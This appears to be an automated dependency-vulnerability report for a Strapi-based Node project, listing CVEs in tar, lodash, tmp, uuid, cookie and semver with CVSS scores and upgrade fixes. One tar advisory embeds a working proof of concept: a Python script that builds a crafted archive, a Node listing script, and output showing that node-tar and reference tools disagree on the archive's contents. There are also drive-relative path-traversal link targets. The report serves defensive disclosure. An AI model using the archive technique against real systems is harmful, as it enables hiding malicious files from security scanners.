tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via a symbolic link supplied as the dir parameter. This is fixed in version 0.2.4.
Publish Date: 2025-08-07
URL: CVE-2025-54798
CVSS 3 Score Details (2.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: High
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
Suggested Fix
Type: Upgrade version
Origin: GHSA-52f5-9888-hmc6
Release Date: 2025-08-07
Fix Resolution (tmp): 0.2.4
Direct dependency fix Resolution (create-strapi-app): 5.41.0
Step up your Open Source Security Game with Mend here
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Vulnerabilities
*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.
**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation
Details
Vulnerable Library - uuid-8.3.2.tgz
RFC4122 (v1, v4, and v5) UUIDs
Library home page: https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
uuid is for the creation of RFC9562 (formerly RFC4122) UUIDs. Prior to 14.0.0, v3, v5, and v6 accept external output buffers but do not reject out-of-range writes (small buf or large offset). This allows silent partial writes into caller-provided buffers. This vulnerability is fixed in 14.0.0.
Publish Date: 2026-04-24
URL: CVE-2026-41907
CVSS 3 Score Details (9.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-w5hq-g745-h8pq
Release Date: 2026-04-24
Fix Resolution: https://github.com/uuidjs/uuid.git - v11.1.1,https://github.com/uuidjs/uuid.git - v13.0.1,https://github.com/uuidjs/uuid.git - v12.0.1
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the "path-reservations" system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., "ß" and "ss"), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a "PathReservations" system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using "NFD" Unicode normalization (in which "ß" and "ss" are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which "ß" causes an inode collision with "ss")). This enables an attacker to circumvent internal parallelization locks ("PathReservations") using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates "path-reservations.js" to use a normalization form that matches the target filesystem's behavior (e.g., "NFKD"), followed by first "toLocaleLowerCase('en')" and then "toLocaleUpperCase('en')". As a workaround, users who cannot upgrade promptly, and who are programmatically using "node-tar" to extract arbitrary tarball data should filter out all "SymbolicLink" entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.
Publish Date: 2026-01-20
URL: CVE-2026-23950
CVSS 3 Score Details (8.8)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: Low
- Integrity Impact: High
- Availability Impact: Low
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-r6q2-hw4h-h46w
Release Date: 2026-01-20
Fix Resolution (tar): 7.5.4
Direct dependency fix Resolution (create-strapi-app): 5.36.1
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.
Publish Date: 2026-01-28
URL: CVE-2026-24842
CVSS 3 Score Details (8.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-01-28
Fix Resolution (tar): 7.5.7
Direct dependency fix Resolution (create-strapi-app): 5.36.1
Step up your Open Source Security Game with Mend here
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Impact:
The fix for CVE-2021-23337 (GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches:
Users should upgrade to version 4.18.0.
Workarounds:
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.
Publish Date: 2026-03-31
URL: CVE-2026-4800
CVSS 3 Score Details (8.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: High
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-r5fr-rjxr-66jc
Release Date: 2026-03-31
Fix Resolution: lodash-amd - 4.18.0,lodash.template - 4.18.0,lodash-es - 4.18.0,lodash - 4.18.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - tmp-0.0.33.tgz
Temporary file and directory creator
Library home page: https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
tmp is a temporary file and directory creator for node.js. Prior to 0.2.6, the tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the prefix, postfix, or dir options. By embedding traversal sequences (e.g., ../) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp's file/directory creation functions without proper input sanitization. This vulnerability is fixed in 0.2.6.
Publish Date: 2026-06-11
URL: CVE-2026-44705
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-05-27
Fix Resolution: https://github.com/raszi/node-tmp.git - v0.2.6
Step up your Open Source Security Game with Mend here
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.
The issue permits deletion of properties but does not allow overwriting their original behavior.
This issue is patched on 4.17.23
Publish Date: 2026-01-21
URL: CVE-2025-13465
CVSS 3 Score Details (7.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: Low
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-xxjr-mmjv-4gpg
Release Date: 2026-01-21
Fix Resolution: lodash-amd - 4.17.23,lodash - 4.17.23,lodash-es - 4.17.23
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.
Publish Date: 2026-03-09
URL: CVE-2026-31802
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-03-09
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.11
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.
Publish Date: 2026-03-07
URL: CVE-2026-29786
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: Low
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-03-07
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.10
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.
Publish Date: 2026-02-20
URL: CVE-2026-26960
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-02-18
Fix Resolution (tar): 7.5.8
Direct dependency fix Resolution (create-strapi-app): 5.37.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.
Publish Date: 2026-01-16
URL: CVE-2026-23745
CVSS 3 Score Details (7.1)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Changed
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: Low
- Availability Impact: None
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Release Date: 2026-01-16
Fix Resolution: https://github.com/isaacs/node-tar.git - v7.5.3
Step up your Open Source Security Game with Mend here
Vulnerable Library - lodash-4.17.21.tgz
Lodash modular utilities.
Library home page: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Impact:
Lodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.
The issue permits deletion of prototype properties but does not allow overwriting their original behavior.
Patches:
This issue is patched in 4.18.0.
Workarounds:
None. Upgrade to the patched version.
Publish Date: 2026-03-31
URL: CVE-2026-2950
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: Low
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-xxjr-mmjv-4gpg
Release Date: 2026-03-31
Fix Resolution (lodash): 4.17.23
Direct dependency fix Resolution (create-strapi-app): 5.37.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
node-tar is a Tar for Node.js. node-tar prior to version 6.2.1 has no limit on the number of sub-folders created in the folder creation process. An attacker who generates a large number of sub-folders can consume memory on the system running node-tar and even crash the Node.js client within few seconds of running it using a path with too many sub-folders inside. Version 6.2.1 fixes this issue by preventing extraction in excessively deep sub-folders.
Publish Date: 2024-03-21
URL: CVE-2024-28863
CVSS 3 Score Details (6.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: High
For more information on CVSS3 Scores, click here.Suggested Fix
Type: Upgrade version
Origin: GHSA-f5x3-32g6-xq36
Release Date: 2024-03-21
Fix Resolution: tar - 6.2.1
Step up your Open Source Security Game with Mend here
Vulnerable Library - tar-6.1.11.tgz
tar for node
Library home page: https://registry.npmjs.org/tar/-/tar-6.1.11.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Summary "tar" (node-tar) applies a PAX extended header's "size=" record (and other PAX overrides) to the next header entry of any type, including intermediary metadata headers such as a GNU long-name ("L") or long-link ("K") entry. Per POSIX pax, a PAX extended header ("x") describes the next file entry, not the intermediary extension headers that may sit between the "x" header and the file it annotates. Because node-tar lets the PAX "size" override the byte length of an intervening "L"/"K"/"x" header, an attacker can desynchronize node-tar's stream cursor relative to every other mainstream tar implementation (GNU tar, libarchive/bsdtar, Python "tarfile", and the now-fixed "tar-rs" / "astral-tokio-tar"). The result is a tar parser interpretation differential (CWE-436): a single crafted archive yields a different set of members under node-tar than under the reference tar tools. An attacker can use this to hide a member from one parser while it is visible to another, which defeats security tooling whose scanner and extractor disagree on archive contents (e.g. a malware/secret scanner that lists entries with one library while a downstream step extracts with another). node-tar is one of the most widely deployed JavaScript tar libraries (it backs "npm"'s own package-tarball handling and is a transitive dependency of a very large fraction of the npm ecosystem), so the blast radius for "files that extract differently depending on the tool" is broad. This is the same root cause and fix that was just addressed upstream in the Rust tar ecosystem ("tar-rs" / "astral-tokio-tar"); node-tar carries the equivalent defect and has no equivalent guard. Impact - CWE-436 Interpretation Conflict / inconsistent tar parsing (the same class as the prior tar "smuggling" advisories GHSA-j5gw-2vrg-8fgx and GHSA-fp55-jw48-c537). 
- A crafted archive can present one logical member list to a tool that lists or scans with node-tar and a different member list to GNU tar / libarchive / Python tarfile (and vice versa). This lets a malicious file be hidden from a scanner that uses a different parser than the eventual extractor, or hidden from node-tar-based inspection while still landing on disk via a system "tar". - No authentication is required; the only precondition is that a victim parses an attacker-supplied tar with node-tar. Tar archives are routinely fetched from untrusted sources (package registries, user uploads, CI artifacts, container layers). - Severity: Medium. Impact is integrity-of-archive-interpretation, not direct RCE; it is a building block for supply-chain / scanner-evasion attacks rather than a standalone code-execution primitive. Vulnerable code (file:line) "src/header.ts" (compiled to "dist/esm/header.js:49" and "dist/commonjs/header.js:85" in the published "tar@7.5.15"): // Header.decode(buf, off, ex, gex) this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12) "ex" is the currently-accumulated PAX local extended header and "gex" the PAX global header. The "size" override from "ex"/"gex" is applied unconditionally to whatever header is being decoded next — there is no check that the header being decoded is a real file entry rather than an intermediary extension header. "src/parse.ts", "[CONSUMEHEADER]" constructs the next header with the current "EX"/"GEX" applied: const header = new Header(chunk, position, this[EX], this[GEX]) and later branches on whether that header is a metadata entry. 
"this[EX]" is cleared only in the non-meta (real file) branch: if (entry.meta) { // L / K / x / g metadata entries: this[EX] is left intact here if (entry.size > this.maxMetaEntrySize) { entry.ignore = true this[STATE] = 'ignore' entry.resume() } else if (entry.size > 0) { this[META] = '' entry.on('data', c => (this[META] += c)) this[STATE] = 'meta' } } else { this[EX] = undefined // EX cleared only once a real file entry is reached } When the stream is ordered "x (PAX, size=N) -> L (GNU long-name) -> file", the "L" header is constructed with "this[EX]" still set, so its "size"/"remain" becomes "N" instead of the "L" payload's true length. node-tar then consumes "N" bytes of "metadata" and resumes header parsing at the wrong offset, landing mid-stream. Every other mainstream parser applies the PAX "size" only to the following file entry, so they stay synchronized. The correct behavior (and the fix shipped upstream in the Rust tar ecosystem) is to not apply PAX "size"/overrides when the entry being decoded is itself an extension header ("L" GNU long-name, "K" GNU long-link, "x" PAX local, "g" PAX global). How input reaches the sink "tar.list()", "tar.extract()"/"tar.x()", and "tar.Parse"/"tar.Unpack" all route every 512-byte header block through "Header.decode(...)" with the currently-accumulated "EX"/"GEX". Any consumer that parses an attacker-supplied archive — "tar.list", "tar.extract", or piping into the streaming "Parser" — reaches the sink. No options need to be enabled; the default code path is affected. 
Proof of concept Archive layout (all standard, GNU-tar-producible blocks): block 0 : x header (PAX local extended, typeflag 'x'), its own size = len(pax body) block 1 : x payload : the single PAX record "...size=2048\n" block 2 : L header (GNU long-name '././@LongLink'), real size = 13 block 3 : L payload : "longname.txt\0" (the long name for the next file) block 4 : file header 'file_a', size = 16 block 5 : file_a body (16 bytes, zero-padded to 512) block 6 : file header 'file_b', size = 16 block 7 : file_b body (16 bytes, zero-padded to 512) Generator ("make_tar.py", pure stdlib, no external deps): def hdr(name, size, typeflag): h = bytearray(512); name = name[:100]; h[0:len(name)] = name h[100:108] = b'0000644\0'; h[108:116] = b'0000000\0'; h[116:124] = b'0000000\0' h[124:136] = ('%011o\0' % size).encode(); h[136:148] = b'00000000000\0' h[156:157] = typeflag; h[257:263] = b'ustar\0'; h[263:265] = b'00' h[148:156] = b' ' * 8 cs = sum(h); h[148:156] = ('%06o\0 ' % cs).encode() return bytes(h) def pad(d): return d + b'\0' * ((512 - len(d) % 512) % 512) def pax_record(key, val): # length-prefixed PAX record "LEN key=val\n" body = b' %s=%s\n' % (key.encode(), str(val).encode()); n = len(body) while True: s = str(n).encode() + body if len(s) == n: break n = len(s) return s pax = pax_record('size', 2048) # malicious: claim size=2048 for the "next" entry out = hdr(b'PaxHeaders/x', len(pax), b'x') + pad(pax) out += hdr(b'././@LongLink', 13, b'L') + pad(b'longname.txt\0') out += hdr(b'file_a', 16, b'0') + pad(b'AAAA_file_a_body') out += hdr(b'file_b', 16, b'0') + pad(b'BBBB_file_b_body') out += b'\0' * 1024 open('pax-desync.tar', 'wb').write(out) A negative-control archive is identical except the PAX record is "pax_record('comment', 'x')" (no "size="), written to "pax-control.tar". 
End-to-end reproduction (against pinned version "tar@7.5.15", latest release) Install the published package into a clean project and parse both archives: $ npm init -y >/dev/null && npm install tar@7.5.15 $ node -e "console.log(require('tar/package.json').version)" 7.5.15 $ grep -n "ex?.size ?? gex?.size" node_modules/tar/dist/esm/header.js 49: this.size = ex?.size ?? gex?.size ?? decNumber(buf, off + 124, 12); "e2e.mjs": import * as tar from 'tar' async function listEntries(f){ const got=[], warns=[] await tar.list({ file:f, onReadEntry:e=>{ got.push({path:e.path,size:e.size,type:e.type}); e.resume() }, onwarn:(code,_msg)=>warns.push(code) }) return { got, warns } } const mal = await listEntries('pax-desync.tar') console.log('MALICIOUS entries :', JSON.stringify(mal.got), 'warnings:', JSON.stringify(mal.warns)) const ctl = await listEntries('pax-control.tar') console.log('CONTROL entries :', JSON.stringify(ctl.got), 'warnings:', JSON.stringify(ctl.warns)) Verbatim output: === Deployed-consumer E2E: npm tar@7.5.15 (latest release) === [MALICIOUS] archive = x(PAX size=2048) -> L(GNU longname "longname.txt") -> file_a(16B) -> file_b(16B) tar.list() entries : [] tar.list() warnings: ["TAR_ENTRY_INVALID"] [NEGATIVE CONTROL] same archive, PAX record is "comment=x" (no size= override) tar.list() entries : [{"path":"longname.txt","size":16,"type":"File"},{"path":"file_b","size":16,"type":"File"}] tar.list() warnings: [] Reference parsers on the same "pax-desync.tar": $ tar tvf pax-desync.tar -rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # GNU tar $ bsdtar tvf pax-desync.tar -rw-r--r-- 0 0 0 2048 Jan 1 1970 longname.txt # libarchive $ python3 -c "import tarfile; print([m.name for m in tarfile.open('pax-desync.tar').getmembers()])" ['longname.txt'] # Python tarfile Interpretation differential: GNU tar, libarchive (bsdtar), and Python "tarfile" all extract the member "longname.txt" from "pax-desync.tar", whereas node-tar "7.5.15" desynchronizes, raises "TAR_ENTRY_INVALID" 
(checksum failure from landing mid-stream), and reports zero members. The negative control proves the divergence is caused solely by the PAX "size=" override being applied to the intermediary "L" header — when the same archive carries a PAX record without "size=", node-tar parses it identically to the reference tools ("longname.txt", "file_b"). Suggested fix When decoding a header, do not apply PAX "size" (or other PAX overrides) if the header being decoded is itself an extension header. Concretely, in "src/parse.ts" clear/ignore "this[EX]" (and "this[GEX]" for "size") when the header's type is "ExtendedHeader", "GlobalExtendedHeader", "NextFileHasLongPath" (GNU "L"), or "NextFileHasLongLinkpath" (GNU "K"); equivalently, in "Header.decode", gate the "ex?.size ?? gex?.size" override on the decoded type not being one of those extension types. This mirrors the upstream Rust fix, which guards "pax_size" with "is_gnu_longname || is_gnu_longlink || is_pax_local_extensions || is_pax_global_extensions". A fix PR is being prepared against a private fork and will be linked here. Fix PR To be linked from a private fork of the repository (the fix will not be pushed to any public fork or to upstream during embargo). Credits Reported by tonghuaroot.
Publish Date: 2026-06-15
URL: CVE-2026-53655
CVSS 3 Score Details (6.2)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
Suggested Fix
Type: Upgrade version
Origin: GHSA-vmf3-w455-68vh
Release Date: 2026-06-15
Fix Resolution: tar - 7.5.16
Vulnerable Library - cookie-0.4.2.tgz
HTTP server cookie parsing and serialization
Library home page: https://registry.npmjs.org/cookie/-/cookie-0.4.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
cookie is a basic HTTP cookie parser and serializer for HTTP servers. The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie. Upgrade to 0.7.0, which updates the validation for name, path, and domain.
Publish Date: 2024-10-04
URL: CVE-2024-47764
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
Suggested Fix
Type: Upgrade version
Origin: GHSA-pxg6-pf52-xh8x
Release Date: 2024-10-04
Fix Resolution (cookie): 0.7.0
Direct dependency fix Resolution (create-strapi-app): 5.0.0
Vulnerable Library - semver-7.3.8.tgz
The semantic version parser used by npm.
Library home page: https://registry.npmjs.org/semver/-/semver-7.3.8.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.
Mend Note: The description of this vulnerability differs from MITRE.
Publish Date: 2023-06-21
URL: CVE-2022-25883
CVSS 3 Score Details (5.3)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: None
- Availability Impact: Low
Suggested Fix
Type: Upgrade version
Origin: GHSA-c2qf-rxjj-qqgw
Release Date: 2023-06-21
Fix Resolution (semver): 7.5.2
Direct dependency fix Resolution (create-strapi-app): 4.12.0
Vulnerable Library - tmp-0.0.33.tgz
Temporary file and directory creator
Library home page: https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz
Path to dependency file: /package.json
Path to vulnerable library: /package.json,/package.json
Dependency Hierarchy:
Found in HEAD commit: 5c021d22206e78241753c80cfeb7d86757675471
Found in base branch: develop
Vulnerability Details
tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.
Publish Date: 2025-08-07
URL: CVE-2025-54798
CVSS 3 Score Details (2.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: High
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: None
Suggested Fix
Type: Upgrade version
Origin: GHSA-52f5-9888-hmc6
Release Date: 2025-08-07
Fix Resolution (tmp): 0.2.4
Direct dependency fix Resolution (create-strapi-app): 5.41.0